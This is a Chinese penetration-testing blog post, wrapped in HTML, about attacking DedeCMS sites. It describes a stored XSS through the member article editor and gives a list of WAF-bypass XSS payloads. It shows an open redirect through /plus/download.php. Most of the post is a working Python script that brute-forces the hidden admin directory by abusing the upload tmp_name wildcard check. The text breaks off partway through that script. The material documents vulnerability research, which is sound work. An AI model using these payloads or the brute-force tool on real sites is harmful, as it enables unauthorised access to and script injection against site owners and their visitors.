<!DOCTYPE html>
<html lang=zh>
<head>
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000" />
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top" />
  
  
  <title>dedecms挖掘 | 东风往林</title>
  <meta name="description" content="一、存储型XSS在一次测试中通过CMS指纹识别出是dedecms模板，网上爆出过当前CMS的多种漏洞，逐一尝试。 使用dedecms几个常用的后台路径访问，没找到后台，御剑扫描了一下目录，无果。于是来到前台用户界面，创建一个用户，来到用户界面，在内容中心有一个文章功能，进入发布文章的详细内容中，填写文章资料，使用富文本选择html模式，插入绕waf的payload语句&lt;details onc">
<meta property="og:type" content="article">
<meta property="og:title" content="dedecms挖掘">
<meta property="og:url" content="http://example.com/2021/06/15/web/dedecms%E6%8C%96%E6%8E%98/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="一、存储型XSS在一次测试中通过CMS指纹识别出是dedecms模板，网上爆出过当前CMS的多种漏洞，逐一尝试。 使用dedecms几个常用的后台路径访问，没找到后台，御剑扫描了一下目录，无果。于是来到前台用户界面，创建一个用户，来到用户界面，在内容中心有一个文章功能，进入发布文章的详细内容中，填写文章资料，使用富文本选择html模式，插入绕waf的payload语句&lt;details onc">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2021/06/15/web/dedecms%E6%8C%96%E6%8E%98/01.jpg">
<meta property="og:image" content="http://example.com/2021/06/15/web/dedecms%E6%8C%96%E6%8E%98/02.jpg">
<meta property="og:image" content="http://example.com/2021/06/15/web/dedecms%E6%8C%96%E6%8E%98/03.jpg">
<meta property="og:image" content="http://example.com/2021/06/15/web/dedecms%E6%8C%96%E6%8E%98/04.jpg">
<meta property="og:image" content="http://example.com/2021/06/15/web/dedecms%E6%8C%96%E6%8E%98/05.jpg">
<meta property="article:published_time" content="2021-06-15T01:34:23.330Z">
<meta property="article:modified_time" content="2022-03-06T06:24:30.737Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2021/06/15/web/dedecms%E6%8C%96%E6%8E%98/01.jpg">
  <!-- Canonical links -->
  <link rel="canonical" href="http://example.com/2021/06/15/web/dedecms%E6%8C%96%E6%8E%98/index.html">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="../images/avatar.jpg" type="image/x-icon">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  
  
  
<meta name="generator" content="Hexo 5.4.0"></head>


<body class="main-center theme-black" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="" target="_blank">
          <img class="img-circle img-rotate" src="/images/avatar.jpg" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">东风往林</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md"></h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> ShanTou, China</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="搜索" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="想要查找什么..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav ">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">首页</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">归档</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories">
            
            <i class="icon icon-folder"></i>
            
            <span class="menu-title">分类</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags">
            
            <i class="icon icon-tags"></i>
            
            <span class="menu-title">标签</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-links">
          <a href="/links">
            
            <i class="icon icon-friendship"></i>
            
            <span class="menu-title">友链</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/noevery" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="/null" target="_blank" title="Weibo" data-toggle=tooltip data-placement=top><i class="icon icon-weibo"></i></a></li>
        
        <li><a href="/null" target="_blank" title="Twitter" data-toggle=tooltip data-placement=top><i class="icon icon-twitter"></i></a></li>
        
        <li><a href="/null" target="_blank" title="Behance" data-toggle=tooltip data-placement=top><i class="icon icon-behance"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">公告</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                <p>打破规则。</p>
            </div>
        </div>
    </div>
</div>

    
      
  <div class="widget">
    <h3 class="widget-title">分类</h3>
    <div class="widget-body">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/python/">python</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/">工具使用</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a><span class="category-list-count">11</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%BC%8F%E6%B4%9E/">漏洞</a><span class="category-list-count">4</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">标签</h3>
    <div class="widget-body">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/python/" rel="tag">python</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/vul/" rel="tag">vul</a><span class="tag-list-count">4</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web/" rel="tag">web</a><span class="tag-list-count">8</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" rel="tag">信息收集</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%86%85%E7%BD%91/" rel="tag">内网</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%B7%A5%E5%85%B7/" rel="tag">工具</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%80%9A%E7%94%A8%E6%BC%8F%E6%B4%9E/" rel="tag">通用漏洞</a><span class="tag-list-count">1</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">标签云</h3>
    <div class="widget-body tagcloud">
      <a href="/tags/python/" style="font-size: 13px;">python</a> <a href="/tags/vul/" style="font-size: 13.67px;">vul</a> <a href="/tags/web/" style="font-size: 14px;">web</a> <a href="/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" style="font-size: 13.33px;">信息收集</a> <a href="/tags/%E5%86%85%E7%BD%91/" style="font-size: 13px;">内网</a> <a href="/tags/%E5%B7%A5%E5%85%B7/" style="font-size: 13.33px;">工具</a> <a href="/tags/%E9%80%9A%E7%94%A8%E6%BC%8F%E6%B4%9E/" style="font-size: 13px;">通用漏洞</a>
    </div>
  </div>

    
      
  <div class="widget">
    <h3 class="widget-title">归档</h3>
    <div class="widget-body">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/03/">三月 2022</a><span class="archive-list-count">5</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/10/">十月 2021</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/08/">八月 2021</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/06/">六月 2021</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/05/">五月 2021</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/04/">四月 2021</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/03/">三月 2021</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/01/">一月 2021</a><span class="archive-list-count">3</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget-body">
      <ul class="recent-post-list list-unstyled no-thumbnail">
        
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/%E6%BC%8F%E6%B4%9E/">漏洞</a>
              </p>
              <p class="item-title">
                <a href="/2022/03/29/vul/Spring-Cloud-Function-SpEL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/" class="title">Spring Cloud Function SpEL表达式注入漏洞</a>
              </p>
              <p class="item-date">
                <time datetime="2022-03-29T06:49:32.369Z" itemprop="datePublished">2022-03-29</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
              </p>
              <p class="item-title">
                <a href="/2022/03/07/web/JWT-%E9%9D%B6%E5%9C%BA%E8%AF%95%E7%82%BC/" class="title">JWT 靶场试炼</a>
              </p>
              <p class="item-date">
                <time datetime="2022-03-07T08:59:18.197Z" itemprop="datePublished">2022-03-07</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/%E6%BC%8F%E6%B4%9E/">漏洞</a>
              </p>
              <p class="item-title">
                <a href="/2022/03/07/vul/%E5%90%91%E6%97%A5%E8%91%B5%E4%B8%AA%E4%BA%BA%E7%89%88-for-Windows%E5%B0%8F%E4%BA%8E%E7%AD%89%E4%BA%8E11.0.0.33%E5%AD%98%E5%9C%A8rce/" class="title">向日葵个人版 for Windows &lt;=11.0.0.33 存在rce</a>
              </p>
              <p class="item-date">
                <time datetime="2022-03-07T07:10:54.516Z" itemprop="datePublished">2022-03-07</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/%E6%BC%8F%E6%B4%9E/">漏洞</a>
              </p>
              <p class="item-title">
                <a href="/2022/03/07/vul/Spring-Cloud-Gateway-CVE-2022-22947/" class="title">Spring-Cloud-Gateway-CVE-2022-22947</a>
              </p>
              <p class="item-date">
                <time datetime="2022-03-07T03:51:39.176Z" itemprop="datePublished">2022-03-07</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/%E6%BC%8F%E6%B4%9E/">漏洞</a>
              </p>
              <p class="item-title">
                <a href="/2022/03/06/vul/%E7%8B%AE%E5%AD%90%E9%B1%BCCMS-ApigoodsController.class.php-SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/" class="title">狮子鱼CMS ApigoodsController.class.php SQL注入漏洞</a>
              </p>
              <p class="item-date">
                <time datetime="2022-03-06T15:32:52.918Z" itemprop="datePublished">2022-03-06</time>
              </p>
            </div>
          </li>
          
      </ul>
    </div>
  </div>
  

    
  </div>
</aside>

  
  
<main class="main" role="main">
  <div class="content">
  <article id="post-web/dedecms挖掘" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
        
  
    <h1 class="article-title" itemprop="name">
      dedecms挖掘
    </h1>
  

      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2021/06/15/web/dedecms%E6%8C%96%E6%8E%98/" class="article-date">
	  <time datetime="2021-06-15T01:34:23.330Z" itemprop="datePublished">2021-06-15</time>
	</a>
</span>
        
  <span class="article-category">
    <i class="icon icon-folder"></i>
    <a class="article-category-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
  </span>

        
  <span class="article-tag">
    <i class="icon icon-tags"></i>
	<a class="article-tag-link-link" href="/tags/web/" rel="tag">web</a>
  </span>


        

	<span class="article-read hidden-xs">
    	<i class="icon icon-eye-fill" aria-hidden="true"></i>
    	<span id="/2021/06/15/web/dedecms%E6%8C%96%E6%8E%98/" class="leancloud_visitors"  data-flag-title="dedecms挖掘">0</span>
    </span>

        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2021/06/15/web/dedecms%E6%8C%96%E6%8E%98/#comments" class="article-comment-link">评论</a></span>
        
      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <h2 id="一、存储型XSS"><a href="#一、存储型XSS" class="headerlink" title="一、存储型XSS"></a>一、存储型XSS</h2><p>在一次测试中通过CMS指纹识别出是dedecms模板，网上爆出过当前CMS的多种漏洞，逐一尝试。</p>
<p>使用dedecms几个常用的后台路径访问，没找到后台，御剑扫描了一下目录，无果。于是来到前台用户界面，创建一个用户，来到用户界面，在内容中心有一个文章功能，进入发布文章的详细内容中，填写文章资料，使用富文本选择html模式，插入绕waf的payload语句&lt;details onclick=&quot;alert`1`&quot;&gt;&lt;/details&gt;，保存，发布文章成功</p>
<p><img src="/2021/06/15/web/dedecms%E6%8C%96%E6%8E%98/01.jpg" alt="图1"></p>
<p>遇到waf时可尝试使用下面一些payload语句,也可以搭配混合绕：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;details onclick&#x3D;alert(1)&gt;&lt;&#x2F;details&gt;</span><br><span class="line">&lt;form&gt;</span><br><span class="line">  &lt;input type&#x3D;submit formaction&#x3D;javascript:alert&#96;1&#96;&gt;</span><br><span class="line">&lt;&#x2F;form&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line">eval(&quot;\x61\x6C\x65\x72\x74\x28\x27\x58\x53\x53\x27\x29&quot;);</span><br><span class="line">&lt;&#x2F;script&gt;</span><br><span class="line">&lt;script&gt;confirm&#x2F;**&#x2F;(1)&#x2F;**&#x2F;&lt;&#x2F;script&gt;</span><br><span class="line">&lt;svg&#x2F;onload&#x3D;alert(1)&gt;</span><br><span class="line">当alert(1)被过滤时可以尝试如下payload</span><br><span class="line">alert&#96;1&#96;</span><br><span class="line">(alert)(1)</span><br><span class="line">(alert)&#96;1&#96;</span><br></pre></td></tr></table></figure>



<p>发布成功后会返回刚刚创建好的文章链接，状态是未审核中，访问刚刚发布的文章，点击详细信息（刚刚插入的payload生成的标签），触发XSS</p>
<p><img src="/2021/06/15/web/dedecms%E6%8C%96%E6%8E%98/02.jpg" alt="图2"></p>
<h2 id="二、url重定向"><a href="#二、url重定向" class="headerlink" title="二、url重定向"></a>二、url重定向</h2><p>dedecms 5.7 sp1中/plus/download.php存在下载重定向漏洞，例如链接：</p>
<p>http:/xxx.xxx.xxx/plus/download.php?open=1&amp;link=aHR0cHM6Ly93d3cuYmFpZHUuY29t其中link参数是<a target="_blank" rel="noopener" href="https://www.baidu.com的base64编码,访问当前链接会跳转到百度页面/">https://www.baidu.com的base64编码，访问当前链接会跳转到百度页面</a></p>
<p><img src="/2021/06/15/web/dedecms%E6%8C%96%E6%8E%98/03.jpg" alt="图3"></p>
<h2 id="三、弱口令"><a href="#三、弱口令" class="headerlink" title="三、弱口令"></a>三、弱口令</h2><p>寻找网站后台，后面请教了我的领导，dedecms可以通过获取文件的size，获取不到说明不是图片或者图片不存在，不存就exit upload…. ,利用这个逻辑猜目录的前提是目录内有图片格式的文件，利用此逻辑遍历后台路径，使用python脚本如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br></pre></td><td class="code"><pre><span class="line">#!&#x2F;usr&#x2F;bin&#x2F;env python</span><br><span class="line"># coding:utf-8</span><br><span class="line">import requests</span><br><span class="line">import itertools</span><br><span class="line">from random import choice</span><br><span class="line">import sys</span><br><span class="line"></span><br><span class="line">characters &#x3D; &quot;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!#@-&quot;</span><br><span class="line">back_dir &#x3D; &quot;&quot;</span><br><span class="line"></span><br><span class="line">show_message &#x3D; &#123;&#125;</span><br><span class="line">check_message &#x3D; &#123;&#125;</span><br><span class="line">valid_file &#x3D; []</span><br><span class="line">data &#x3D; &#123;</span><br><span class="line">    &quot;_FILES[tools][tmp_name]&quot;: &quot;.&#x2F;..&#x2F;&#123;p&#125;&lt;&lt;&#x2F;images&#x2F;adminico.gif&quot;,</span><br><span class="line">    &quot;_FILES[tools][name]&quot;: 0,</span><br><span class="line">    &quot;_FILES[tools][size]&quot;: 0,</span><br><span class="line">    &quot;_FILES[tools][type]&quot;: &quot;image&#x2F;gif&quot;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">headers &#x3D; &#123;</span><br><span class="line"></span><br><span class="line">    &quot;User-Agent&quot;: &quot;Mozilla&#x2F;5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko&#x2F;20100101 Firefox&#x2F;40.0&quot;,</span><br><span class="line">    &quot;Accept&quot;: &quot;text&#x2F;html,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,*&#x2F;*;q&#x3D;0.8&quot;,</span><br><span class="line">    &quot;Accept-Language&quot;: &quot;zh-CN,zh;q&#x3D;0.8,en-US;q&#x3D;0.5,en;q&#x3D;0.3&quot;,</span><br><span class="line">    &quot;Content-Type&quot;: &quot;application&#x2F;x-www-form-urlencoded&quot;,</span><br><span class="line">    &quot;Connection&quot;: &quot;Close&quot;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">class Bute_Login:</span><br><span class="line">    global headers</span><br><span class="line"></span><br><span class="line">    def __init__(self, target):</span><br><span class="line">        self.target &#x3D; target</span><br><span class="line"></span><br><span class="line">    def Check(self):</span><br><span class="line">        global data, check_message, valid_file</span><br><span class="line"></span><br><span class="line">        File_Chek_List &#x3D; [&#39;&#x2F;tags.php&#39;, &#39;&#x2F;include&#x2F;vdimgck.php&#39;, &#39;&#x2F;m&#x2F;list.php&#39;, &#39;&#x2F;m&#x2F;view.php&#39;, &#39;&#x2F;member&#x2F;config.php&#39;,</span><br><span class="line">                          &#39;&#x2F;plus&#x2F;advancedsearch.php&#39;,</span><br><span class="line">                          &#39;&#x2F;plus&#x2F;arcmulti.php&#39;, &#39;&#x2F;plus&#x2F;bookfeedback.php&#39;, &#39;&#x2F;plus&#x2F;bookfeedback_js.php&#39;, &#39;&#x2F;plus&#x2F;car.php&#39;,</span><br><span class="line">                          &#39;&#x2F;plus&#x2F;carbuyaction.php&#39;,</span><br><span class="line">                          &#39;&#x2F;plus&#x2F;comments_frame.php&#39;, &#39;&#x2F;plus&#x2F;count.php&#39;, &#39;&#x2F;plus&#x2F;digg_ajax.php&#39;, &#39;&#x2F;plus&#x2F;digg_frame.php&#39;,</span><br><span class="line">                          &#39;&#x2F;plus&#x2F;digg_frame.php&#39;,</span><br><span class="line">                          &#39;&#x2F;plus&#x2F;disdls.php&#39;, &#39;&#x2F;plus&#x2F;diy.php&#39;, &#39;&#x2F;plus&#x2F;download.php&#39;, &#39;&#x2F;plus&#x2F;erraddsave.php&#39;,</span><br><span class="line">                          &#39;&#x2F;plus&#x2F;feedback.php&#39;, &#39;&#x2F;plus&#x2F;feedback_ajax.php&#39;, &#39;&#x2F;plus&#x2F;flink.php&#39;, &#39;&#x2F;plus&#x2F;flink.php&#39;,</span><br><span class="line">                          &#39;&#x2F;plus&#x2F;flink_add.php&#39;,</span><br><span class="line">                          &#39;&#x2F;plus&#x2F;freelist.php&#39;, &#39;&#x2F;plus&#x2F;heightsearch.php&#39;, &#39;&#x2F;plus&#x2F;list.php&#39;, &#39;&#x2F;plus&#x2F;mytag_js.php&#39;,</span><br><span class="line">                          &#39;&#x2F;plus&#x2F;posttocar.php&#39;, &#39;&#x2F;plus&#x2F;qrcode.php&#39;, &#39;&#x2F;plus&#x2F;recommend.php&#39;, &#39;&#x2F;plus&#x2F;rss.php&#39;,</span><br><span class="line">                          &#39;&#x2F;plus&#x2F;search.php&#39;, &#39;&#x2F;plus&#x2F;showphoto.php&#39;,</span><br><span class="line">                          &#39;&#x2F;plus&#x2F;stow.php&#39;, &#39;&#x2F;plus&#x2F;view.php&#39;, &#39;&#x2F;plus&#x2F;vote.php&#39;, &#39;&#x2F;special&#x2F;index.php&#39;]</span><br><span class="line">        for filename in File_Chek_List:</span><br><span class="line">            try:</span><br><span class="line">                res &#x3D; requests.post(self.target + filename, data&#x3D;data)</span><br><span class="line">                # print self.target+filename+&quot;---&gt;&quot;+res.text</span><br><span class="line">                if &quot;Upload filetype not allow !&quot; in res.text and res.status_code &#x3D;&#x3D; 200:</span><br><span class="line">                    valid_file.append(filename)</span><br><span class="line">            except:</span><br><span class="line">                pass</span><br><span class="line">        # print valid_file</span><br><span class="line">        # print valid_file</span><br><span class="line">        if len(valid_file):</span><br><span class="line">            if &quot;&#x2F;tags.php&quot; in valid_file:</span><br><span class="line">                for i in valid_file:</span><br><span class="line">                    if i &#x3D;&#x3D; &quot;&#x2F;tags.php&quot;:</span><br><span class="line">                        return i</span><br><span class="line">            else:</span><br><span class="line">                file_name &#x3D; choice(valid_file)</span><br><span class="line">                return file_name</span><br><span class="line">        else:</span><br><span class="line">            return False</span><br><span class="line"></span><br><span class="line">    def Bute(self):</span><br><span class="line">        f_name &#x3D; self.Check()</span><br><span class="line">        # print f_name</span><br><span class="line">        if f_name !&#x3D; False:</span><br><span class="line">            if f_name &#x3D;&#x3D; &quot;&#x2F;tags.php&quot;:</span><br><span class="line">                prefix &#x3D; &quot;.&#x2F;&quot;</span><br><span class="line">            else:</span><br><span class="line">                prefix &#x3D; &quot;.&#x2F;..&#x2F;&quot;</span><br><span class="line">            flag &#x3D; 0</span><br><span class="line">            global characters, back_dir, data, check_message</span><br><span class="line">            for num in range(1, 7):</span><br><span class="line">                if flag:</span><br><span class="line">                    break</span><br><span class="line">                for pre in itertools.permutations(characters, num):</span><br><span class="line">                    pre &#x3D; &#39;&#39;.join(list(pre))</span><br><span class="line">                    data[&quot;_FILES[tools][tmp_name]&quot;] &#x3D; data[&quot;_FILES[tools][tmp_name]&quot;].format(p&#x3D;pre)</span><br><span class="line">                    print(&quot;testing&quot;, pre)</span><br><span class="line">                    r &#x3D; requests.post(self.target + f_name, data&#x3D;data)</span><br><span class="line">                    if &quot;Upload filetype not allow !&quot; not in r.text and r.status_code &#x3D;&#x3D; 200:</span><br><span class="line">                        flag &#x3D; 1</span><br><span class="line">                        back_dir &#x3D; pre</span><br><span class="line">                        data[&quot;_FILES[tools][tmp_name]&quot;] &#x3D; &quot;%s&#123;p&#125;&lt;&lt;&#x2F;images&#x2F;adminico.gif&quot; % prefix</span><br><span class="line">                        break</span><br><span class="line">                    else:</span><br><span class="line">                        data[&quot;_FILES[tools][tmp_name]&quot;] &#x3D; &quot;%s&#123;p&#125;&lt;&lt;&#x2F;images&#x2F;adminico.gif&quot; % prefix</span><br><span class="line">            # print(&quot;[+] 前缀为：&quot;,back_dir)</span><br><span class="line">            flag &#x3D; 0</span><br><span class="line">            for i in range(30):</span><br><span class="line">                if flag:</span><br><span class="line">                    break</span><br><span class="line">                for ch in characters:</span><br><span class="line">                    if ch &#x3D;&#x3D; characters[-1]:</span><br><span class="line">                        flag &#x3D; 1</span><br><span class="line">                        break</span><br><span class="line">                    data[&quot;_FILES[tools][tmp_name]&quot;] &#x3D; data[&quot;_FILES[tools][tmp_name]&quot;].format(p&#x3D;back_dir + ch)</span><br><span class="line">                    r &#x3D; requests.post(self.target + f_name, data&#x3D;data)</span><br><span class="line">                    if &quot;Upload filetype not allow !&quot; not in r.text and r.status_code &#x3D;&#x3D; 200:</span><br><span class="line">                        back_dir +&#x3D; ch</span><br><span class="line">                        # print(&quot;[+] &quot;,back_dir)</span><br><span class="line">                        data[&quot;_FILES[tools][tmp_name]&quot;] &#x3D; &quot;%s&#123;p&#125;&lt;&lt;&#x2F;images&#x2F;adminico.gif&quot; % prefix</span><br><span class="line">                        break</span><br><span class="line">                    else:</span><br><span class="line">                        data[&quot;_FILES[tools][tmp_name]&quot;] &#x3D; &quot;%s&#123;p&#125;&lt;&lt;&#x2F;images&#x2F;adminico.gif&quot; % prefix</span><br><span class="line">            show_message[&#39;Login_url&#39;] &#x3D; self.target + &quot;&#x2F;%s&quot; % 